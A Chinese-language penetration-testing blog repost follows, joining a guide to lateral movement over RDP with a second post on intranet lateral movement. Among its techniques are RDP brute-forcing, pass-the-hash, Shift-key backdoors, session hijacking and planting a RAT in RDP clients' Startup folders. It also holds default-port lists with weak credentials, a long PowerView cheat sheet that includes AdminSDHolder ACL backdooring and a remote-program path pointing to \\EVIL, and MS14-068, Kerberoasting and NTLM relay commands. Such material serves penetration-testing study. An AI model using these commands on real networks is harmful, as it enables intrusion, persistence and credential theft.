横向渗透之 [RDP]
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了横向渗透之 [RDP]相关的知识,希望对你有一定的参考价值。
参考技术A**一、RDP 服务确定和启动 **
1. 确定RDP服务是否启动和服务端口
(1)注册表查询
(2)进程查看
2. 启动RDP服务
(1)cmd 本地注册表启动
也可以通过reg配置文件的方式启动:regedit /s startrdp.reg
(2) 利用Wmic 启动远程主机的RDP服务
二、RDP 用户登录前
(1) 明文密码:RDP爆破,SMB爆破(使用MSF中的smb_login 模块可以确定有效用户并判断是否是管理员组的)等工具
(2) Hash:Impacket工具包中的rdp_check.py 脚本可以通过hash确定目标机器是否存在枚举的用户
当用户存在时会提示 Access Granted,否者提示 Access Denied
(3) RDP中间人:Seth
执行后客户端链接服务器会失败,过段时间恢复正常
但是如果普通的用户,那需要进一步判断目标系统来确定合适的登录时机
(1) Windows XP、2003 支持统一用户登陆多地登陆互不影响,使用query user查看在线用户,XP没有该命令也可以使用taskmgr从任务管理器查看,同一权限下可以相互注 销会话。
(2) 非服务器版本的Windows 系统默认只允许一个账户登录。当远程用户登录时使用与原系统相同的账户,原系统将切换到登陆页面,并会看到登陆的机器名
如果使用不同的账户,原系统将弹窗提示其他用户已登陆到此计算机
选择继续后,原系统将会提示是否端口当前链接(30s后默认选择同意,退出到登陆页面)
(1) mstsc.exe
可以通过如下命令开启 Restricted Admin mode
开启后使用:mstsc.exe /restrictedadmin 进行登录不需要密码,将使用当前用户的hash 进行验证
(2) mimikatz.exe
4 . Linux上使用用户hash登录
PS:这里有一个坑,高版本xfreerdp不支持 /pth 参数,可以使用上面的安装命令安装支持/pth的版本,也可以使用kali/parrot中默认安装好
PS2:如果RDP服务启动了,客户端无法链接,可能是防火墙配置的问题,可以执行如下命 令添加防火墙规则允许3389端口TCP通信
PS3:如果出现远程连接出现身份验证错误,要求的函数不支持,解决方法:
**四、关于 RDP 权限维持方法 **
1. 关闭 RDP 安全认证
当服务器开启安全认证时,必须先通过登陆密码才能进入远程桌面;如果服务端用的是 不安全的认证方式,即可以先远程链接后登陆可以触发Shift后门
如何设置不安全的连接,去掉”仅允许使用网络级别的身份验证的远程桌面的计算机连 接”选项,需要注意的是先上系统后验证也会在计算机本地留下一定的进程、日志。
2. Shift后门 + RDP劫持
配合上面的关闭RDP安全认证方式,利用Shift后门可以让攻击者快速获得System权 限,结合RDP劫持可以实现无需创建用户、不更改劫持用户登录时间、解锁劫持用户界面、 等功能。注意RDP劫持需要System权限
另外一种方法可以通过创建服务激活
Mimikatz中也有相关的利用模块
3. 开启多人登录模式
(1)手动设置:将计算机配置(Computer Configuration)->管理模板 (Administrative Templates)->Windows组件(Windows Components)->远程桌面 服务(Remote Desktop Services)->远程桌面会话主机(Remote Desktop Session Host)->链接(Connections),禁用”将远程桌面服务的用户限制到单独的远程桌面会 话”(Restrict Remote Desktop Services users to a single Remote Desktop Services session) (2)Mimikatz 开启多用户登录,支持Win 7 及以前的版本系统
PS:使用与原系统相同的账户,原系统还是会被切换到登录界面;不同账户登陆成功 (3)RDPwrap:支持Win Vista - Win10
(4)SharpDoor:仅使用于Win 10 开启多会话RDP
**五、RDP 服务器反打客户端 **
需要客户端RDP链接时,开启磁盘共享(将本地磁盘挂在到服务器上)才能正常利用
2. 手动利用过程:假设客户端和登录服务器的用户都是Administrator
\\Startup\\powershell.vbs 作用是无弹窗执行bat脚本
(2)Windows.bat 脚本内容实现马(service.exe)拷贝到客户端的启动目录
也可以根据实际情况,将Rat拷贝到客户端的其他目录,将激活脚本拷贝到客户端启动目 录;如果不出网的情况下,也可以将exe替换成要执行的脚本 。
内网渗透系列:横向渗透方法小结
前言
本文学习并小结下横向渗透的方法
一、端口渗透
1、常见默认端口
(1)web类(web漏洞/敏感目录)
第三方通用组件漏洞: struts、thinkphp、jboss、ganglia、zabbix等
80 web
80-89 web
8000-9090 web
(2)数据库类(扫描弱口令)
1433 MSSQL
1521 Oracle
3306 MySQL
5432 PostgreSQL
50000 DB2
(3)特殊服务类(未授权/命令执行类/漏洞)
443 SSL心脏滴血
445 ms08067/ms11058/ms17010等
873 Rsync未授权
5984 CouchDB http://xxx:5984/_utils/
6379 redis未授权
7001,7002 WebLogic默认弱口令,反序列
9200,9300 elasticsearch 参考: 多玩某服务器ElasticSearch命令执行漏洞
11211 memcache未授权访问
27017,27018 Mongodb未授权访问
50000 SAP命令执行
50070,50030 hadoop默认端口未授权访问
(4)常用端口类(扫描弱口令/端口爆破)
21 ftp
22 SSH
23 Telnet
445 SMB弱口令扫描
2601,2604 zebra路由,默认密码zebra
3389 远程桌面
(5)端口合计所对应的服务
21 ftp
22 SSH
23 Telnet
25 SMTP
53 DNS
69 TFTP
80 web
80-89 web
110 POP3
135 RPC
139 NETBIOS
143 IMAP
161 SNMP
389 LDAP
443 SSL心脏滴血以及一些web漏洞测试
445 SMB
512,513,514 Rexec
873 Rsync未授权
1025,111 NFS
1080 socks
1158 ORACLE EMCTL2601,2604 zebra路由,默认密码zebra案
1433 MSSQL (暴力破解)
1521 Oracle:(iSqlPlus Port:5560,7778)
2082/2083 cpanel主机管理系统登陆 (国外用较多)
2222 DA虚拟主机管理系统登陆 (国外用较多)
2601,2604 zebra路由,默认密码zebra
3128 squid代理默认端口,如果没设置口令很可能就直接漫游内网了
3306 MySQL (暴力破解)
3312/3311 kangle主机管理系统登陆
3389 远程桌面
3690 svn
4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网
4848 GlassFish web中间件 弱口令:admin/adminadmin
5432 PostgreSQL
5900 vnc
5984 CouchDB http://xxx:5984/_utils/
6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网
6379 redis未授权
7001,7002 WebLogic默认弱口令,反序列
7778 Kloxo主机控制面板登录
8000-9090 都是一些常见的web端口,有些运维喜欢把管理后台开在这些非80的端口上
8080 tomcat/WDCd/ 主机管理系统,默认弱口令
8080,8089,9090 JBOSS
8081 Symantec AV/Filter for MSE
8083 Vestacp主机管理系统 (国外用较多)
8649 ganglia
8888 amh/LuManager 主机管理系统默认端口
9000 fcgi fcig php执行
9043 websphere[web中间件] 弱口令: admin/admin websphere/ websphere ststem/manager
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
10000 Virtualmin/Webmin 服务器虚拟主机管理系统
11211 memcache未授权访问
27017,27018 Mongodb未授权访问
28017 mongodb统计页面
50000 SAP命令执行
50060 hadoop
50070,50030 hadoop默认端口未授权访问
2、端口扫描
目标信息
- 端口的指纹信息(版本信息)
- 端口所对应运行的服务
- 常见的默认端口号
- 尝试弱口令
工具
二、域渗透
1、信息搜集
(1)PowerView
Get-NetDomain - gets the name of the current user's domain
Get-NetForest - gets the forest associated with the current user's domain
Get-NetForestDomains - gets all domains for the current forest
Get-NetDomainControllers - gets the domain controllers for the current computer's domain
Get-NetCurrentUser - gets the current [domain\\]username
Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
Get-NetUserSPNs - gets all user ServicePrincipalNames
Get-NetOUs - gets data for domain organization units
Get-NetGUIDOUs - finds domain OUs linked to a specific GUID
Invoke-NetUserAdd - adds a local or domain user
Get-NetGroups - gets a list of all current groups in the domain
Get-NetGroup - gets data for each user in a specified domain group
Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts
Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts
Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts
Invoke-NetGroupUserAdd - adds a user to a specified local or domain group
Get-NetComputers - gets a list of all current servers in the domain
Get-NetFileServers - get a list of file servers used by current domain users
Get-NetShare - gets share information for a specified server
Get-NetLoggedon - gets users actively logged onto a specified server
Get-NetSessions - gets active sessions on a specified server
Get-NetFileSessions - returned combined Get-NetSessions and Get-NetFiles
Get-NetConnections - gets active connections to a specific server resource (share)
Get-NetFiles - gets open files on a server
Get-NetProcesses - gets the remote processes and owners on a remote server
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
Get-NetLocalGroup -Recurse SERVER.domain.local
# retrieve all the computers a GPP password applies to
Get-NetOU -GUID <GPP_GUID> | % Get-NetComputer -ADSPath $_
# get all users with passwords changed > 1 year ago
$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-NetUser -Filter "(pwdlastset<=$Date)"
# all enabled users
Get-NetUser -Filter "(!userAccountControl:1.2.840.113556.1.4.803:=2)"
# all disabled users
Get-NetUser -Filter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
# all users that require smart card authentication
Get-NetUser -Filter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
# all users that don't require smart card authentication
Get-NetUser -Filter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
# enumerate all servers that allow unconstrained delegation, and all users that aren't marked as sensitive/not for delegation
$Computers = Get-NetComputer -Unconstrained
$Users = Get-NetUser -AllowDelegation -AdminCount
# enumerate servers that allow unconstrained kerberos delegation and show all users logged in
Invoke-UserHunter -Unconstrained -ShowAll
# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation
Invoke-UserHunter -Unconstrained -AdminCount -AllowDelegation
# Get the logged on users for all machines in any *server* OU in a particular domain
Get-NetOU *server* -Domain <domain> | %Get-NetComputer -ADSPath $_ | %Get-NetLoggedOn -ComputerName $_
# find all users with an SPN set (likely service accounts)
Get-NetUser -SPN
# find all service accounts in "Domain Admins"
Get-NetUser -SPN | ?$_.memberof -match 'Domain Admins'
# hunt for all privileged users (adminCount=1)
Invoke-UserHunter -AdminCount
# find users with sidHistory set
Get-NetUser -Filter '(sidHistory=*)'
# enumerate all gobal catalogs in the forest
Get-NetForestCatalog
# turn a list of computer short names to FQDNs
gc computers.txt | % Get-NetComputer -ADSpath "GC://GLOBAL.CATALOG" -Filter "(name=$_)"
# find interesting .vbs/.bat/.ps1 scripts on domain controllers
Invoke-FileFinder -SearchSYSVol
# enumerate the current domain policy, optionally specifying a domain to query for or a DC to reflect queries through
$DomainPolicy = Get-DomainPolicy [-Domain <DOMAIN>] [-DomainController <DC>]
$DomainPolicy.KerberosPolicy # useful for golden tickets ;)
$DomainPolicy.SystemAccess
# enumerate the current domain controller policy, resolving SIDs to account names, and seeing who has what rights on DCs by default
$DcPolicy = Get-DomainPolicy -Source DC -ResolveSids
$DcPolicy.PrivilegeRights
# enumerate what machines that a particular group has local admin rights to
Find-GPOLocation -GroupName <GROUP>
# enumerate what machines that a given user in the specified domain has RDP access rights to, reflecting queries through a particular DC
Find-GPOLocation -UserName <USER> -Domain <DOMAIN> -DomainController <DC> -LocalGroup RDP
# export a csv of all GPO mappings
Find-GPOLocation | %$_.computers = $_.computers -join ", "; $_ | Export-CSV -NoTypeInformation gpo_map.csv
# use alternate credentials for searching for files on the domain
$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\\user",$Password)
Invoke-FileFinder -Domain DOMAIN -Credential $Credential
# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names
Get-ObjectAcl -SamAccountName matt -Domain testlab.local -ResolveGUIDs
# grant user 'will' the rights to change 'matt's password
Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName will -Rights ResetPassword
# audit the permissions of AdminSDHolder, resolving GUIDs
Get-ObjectACL -ADSPrefix 'CN=AdminSDHolder,CN=System' -ResolveGUIDs
# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName matt -Rights All
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-ObjectACL -DistinguishedName "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ?
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
# find linked DA accounts using name correlation
Get-NetGroupMember -GroupName "Domain Admins" | % Get-NetUser $_.membername | % $a=$_.displayname.split(" ")[0..1] -join " "; Get-NetUser -Filter "(displayname=*$a*)" | Select-Object -Property displayname,samaccountname
# save a PowerView object to disk for later usage
Get-NetUser | Export-Clixml user.out
$Users = Import-Clixml user.out
# Find any machine accounts in privileged groups
Get-NetGroup -AdminCount | Get-NetGroupMember -Recurse | ?$_.MemberName -like '*$'
# Enumerate permissions for GPOs where users have some kind of modify rights
Get-NetGPO | Get-ObjectAcl -ResolveGUIDs | Where-Object ($_.ObjectType -eq 'All') -and ($_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty|CreateChild" )
# find all policies applied to a current machine
Get-NetGPO -ComputerName WINDOWS1.testlab.local
# find the user/groups that have read access to the LAPS password property for a specified computer
Get-NetComputer -ComputerName 'LAPSCLIENT.test.local' -FullData |
Select-Object -ExpandProperty distinguishedname |
ForEach-Object $_.substring($_.indexof('OU')) | ForEach-Object
Get-ObjectAcl -ResolveGUIDs -DistinguishedName $_
| Where-Object
($_.ObjectType -like 'ms-Mcs-AdmPwd') -and
($_.ActiveDirectoryRights -match 'ReadProperty')
| ForEach-Object
Convert-NameToSid $_.IdentityReference
| Select-Object -ExpandProperty SID | Get-ADObject
# get the ACLs for all OUs where someone is allowed to read the LAPS password attribute
Get-NetOU -FullData |
Get-ObjectAcl -ResolveGUIDs |
Where-Object
($_.ObjectType -like 'ms-Mcs-AdmPwd') -and
($_.ActiveDirectoryRights -match 'ReadProperty')
| ForEach-Object
$_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID;
$_
# perform a user 'zone transfer' by exporting all AD DNS records from all zones, exporting to a .csv
Get-DNSZone | Get-DNSRecord | Export-CSV -NoTypeInformation dns.csv
# return all universal security groups in a forest with foreign members
Get-NetGroup -Filter '(member=*)(groupType=2147483656)' -ADSPath 'GC://testlab.local' -FullData | Select-Object samaccountname,distinguishedname,member | ForEach-Object
$GroupDomain = $_.distinguishedname.subString($_.distinguishedname.IndexOf("DC="))
$_.Member = $_.Member | ForEach-Object
$MemberDomain = $_.subString($_.IndexOf("DC="))
if($GroupDomain -ne $MemberDomain)
$_
$_
| Where-Object $_.Member
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
# Add : add a new object to a destination
# Set : modify a given object
# Invoke : lazy catch-all
# Nouns:
# Verb-Domain* : indicates that LDAP/.NET querying methods are being executed
# Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration
# Verb-Net* : indicates that Win32 API access is being used under the hood
# get all the groups a user is effectively a member of, 'recursing up' using tokenGroups
Get-DomainGroup -MemberIdentity <User/Group>
# get all the effective members of a group, 'recursing down'
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
# use an alterate creadential for any function
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)
Get-DomainUser -Credential $Cred
# retrieve all the computer dns host names a GPP password applies to
Get-DomainOU -GPLink '<GPP_GUID>' | % Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname
# get all users with passwords changed > 1 year ago, returning sam account names and password last set times
$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset
# all enabled users, returning distinguishednames
Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname
# all disabled users
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
Get-DomainUser -UACFilter ACCOUNTDISABLE
# all users that require smart card authentication
Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
Get-DomainUser -UACFilter SMARTCARD_REQUIRED
# all users that *don't* require smart card authentication, only returning sam account names
Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname
# use multiple identity types for any *-Domain* function
'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
# find all users with an SPN set (likely service accounts)
Get-DomainUser -SPN
# check for users who don't have kerberos preauthentication set
Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
# find all service accounts in "Domain Admins"
Get-DomainUser -SPN | ?$_.memberof -match 'Domain Admins'
# find users with sidHistory set
Get-DomainUser -LDAPFilter '(sidHistory=*)'
# find any users/computers with constrained delegation st
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
# enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation
$Computers = Get-DomainComputer -Unconstrained
$Users = Get-DomainUser -AllowDelegation -AdminCount
# return the local *groups* of a remote server
Get-NetLocalGroup SERVER.domain.local
# return the local group *members* of a remote server using Win32 API methods (faster but less info)
Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local
# Kerberoast any users in a particular OU with SPNs set
Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"
# Find-DomainUserLocation == old Invoke-UserHunter
# enumerate servers that allow unconstrained Kerberos delegation and show all users logged in
Find-DomainUserLocation -ComputerUnconstrained -ShowAll
# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
# find all computers in a given OU
Get-DomainComputer -SearchBase "ldap://OU=..."
# Get the logged on users for all machines in any *server* OU in a particular domain
Get-DomainOU -Identity *server* -Domain <domain> | %Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %Get-NetLoggedOn -ComputerName $_
# enumerate all gobal catalogs in the forest
Get-ForestGlobalCatalog
# turn a list of computer short names to FQDNs, using a global catalog
gc computers.txt | % Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname
# enumerate the current domain controller policy
$DCPolicy = Get-DomainPolicy -Policy DC
$DCPolicy.PrivilegeRights # user privilege rights on the dc...
# enumerate the current domain policy
$DomainPolicy = Get-DomainPolicy -Policy Domain
$DomainPolicy.KerberosPolicy # useful for golden tickets ;)
$DomainPolicy.SystemAccess # password age/etc.
# enumerate what machines that a particular user/group identity has local admin rights to
# Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation
Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>
# enumerate what machines that a given user in the specified domain has RDP access rights to
Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP
# export a csv of all GPO mappings
Get-DomainGPOUserLocalGroupMapping | %$_.computers = $_.computers -join ", "; $_ | Export-CSV -NoTypeInformation gpo_map.csv
# use alternate credentials for searching for files on the domain
# Find-InterestingDomainShareFile == old Invoke-FileFinder
$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\\user",$Password)
Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential
# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names
Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local
# grant user 'will' the rights to change 'matt's password
Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose
# audit the permissions of AdminSDHolder, resolving GUIDs
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs
# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ?
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
# find linked DA accounts using name correlation
Get-DomainGroupMember 'Domain Admins' | %Get-DomainUser $_.membername -LDAPFilter '(displayname=*)' | %$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname
# save a PowerView object to disk for later usage
Get-DomainUser | Export-Clixml user.xml
$Users = Import-Clixml user.xml
# Find any machine accounts in privileged groups
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?$_.MemberName -like '*$'
# Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\\d3,$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')
# find all policies applied to a current machine
Get-DomainGPO -ComputerIdentity windows1.testlab.local
# enumerate all groups in a domain that don't have a global scope, returning just group names
Get-DomainGroup -GroupScope NotGlobal -Properties name
# enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships
# query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames
$ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? $_.objectsid -match '^S-1-5-.*-[1-9]\\d2,$' | Select-Object -ExpandProperty distinguishedname
$Domains = @
$ForeignMemberships = ForEach($ForeignUser in $ForeignUsers)
# extract the domain the foreign user was added to
$ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
# check if we've already enumerated this domain
if (-not $Domains[$ForeignUserDomain])
$Domains[$ForeignUserDomain] = $True
# enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set
$Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))"
Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member
$ForeignMemberships | fl
# if running in -sta mode, impersonate another credential a la "runas /netonly"
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)
Invoke-UserImpersonation -Credential $Cred
# ... action
Invoke-RevertToSelf
# enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer
Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
# set the specified property for the given user identity
Set-DomainObject testuser -Set @'mstsinitialprogram'='\\\\EVIL\\program.exe' -Verbose
# Set the owner of 'dfm' in the current domain to 'harmj0y'
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ?
($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')
# check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru | fl
(2)获取某OU下所有机器信息
"name": "Find the specificed OU computers",
"queryList": [
"final": false,
"title": "Select a OU...",
"query": "MATCH (n:OU) RETURN distinct n.name ORDER BY n.name DESC"
,
"final": true,
"query": "MATCH (m:OU name: $result) with m MATCH p=(o:OU objectid: m.objectid)-[r:Contains*1..]->(n:Computer) RETURN p",
"allowCollapse": true,
"endNode": ""
]
(3)自动标记owned用户及机器
(4)获取域内DNS信息
2、获取域控
(1)SYSVOL
SYSVOL是指存储域公共文件服务器副本的共享文件夹,它们在域中所有的域控制器之间复制。 Sysvol文件夹是安装AD时创建的,它用来存放GPO、Script等信息。同时,存放在Sysvol文件夹中的信息,会复制到域中所有DC上
可参考:
- 寻找SYSVOL里的密码和攻击GPP(组策略偏好)
- Windows Server 2008 R2之四管理Sysvol文件夹
- 获取AD域中SYSVOL和组策略首选项中的密码
- 利用SYSVOL还原组策略中保存的密码
- Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
(2)MS14-068 Kerberos
python ms14-068.py -u 域用户@域名 -p 密码 -s 用户SID -d 域主机
利用mimikatz将工具得到的TGT_domainuser@SERVER.COM.ccache写入内存,创建缓存证书:
mimikatz.exe "kerberos::ptc c:TGT_darthsidious@pentest.com.ccache" exit
net use k: \\pentest.comc$
参考:
(3)SPN扫描
Kerberoast可以作为一个有效的方法从Active Directory中以普通用户的身份提取服务帐户凭据,无需向目标系统发送任何数据包
SPN是服务在使用Kerberos身份验证的网络上的唯一标识符。它由服务类,主机名和端口组成。在使用Kerberos身份验证的网络中,必须在内置计算机帐户(如NetworkService或LocalSystem)或用户帐户下为服务器注册SPN。对于内部帐户,SPN将自动进行注册。但是,如果在域用户帐户下运行服务,则必须为要使用的帐户的手动注册SPN
SPN扫描的主要好处是:SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描
参考:
(4)Kerberos的黄金票据和白银票据
黄金票据和白银票据的一些区别:
- Golden Ticket伪造TGT,可以获取任何Kerberos服务权限;银票伪造TGS,只能访问指定的服务
- 加密方式不同: Golden Ticket由krbtgt的hash加密;Silver Ticket由服务账号(通常为计算机账户)Hash加密
- 认证流程不同: 金票在使用的过程需要同域控通信;银票在使用的过程不需要同域控通信
参考:
- 一文了解黄金票据和白银票据
- Kerberos Golden Tickets are Now More Golden
- 内网安全之域服务账号破解实践
- kerberos认证原理—讲的非常细致,易懂
- 攻击者如何使用Kerberos的银票来利用系统
- 域渗透——Pass The Ticket
(5)域服务账号破解
与上面SPN扫描类似的原理
工具:https://github.com/nidem/kerberoast
#获取所有用作SPN的帐户
setspn -T PENTEST.com -Q */*
#从Mimikatz的RAM中提取获得的门票
kerberos::list /export
#用rgsrepcrack破解
tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
(6)NTLM relay
参考:
- 跟着玄武大佬学NTLM relay攻防
- 内网渗透测试:NTLM Relay攻击分析
- One API call away from Domain Admin
- privexchange
- Exchange2domain
用于主动让目标机器发起NTLM请求的方法:
Relay LDAP:
Relay AD CS/PKI: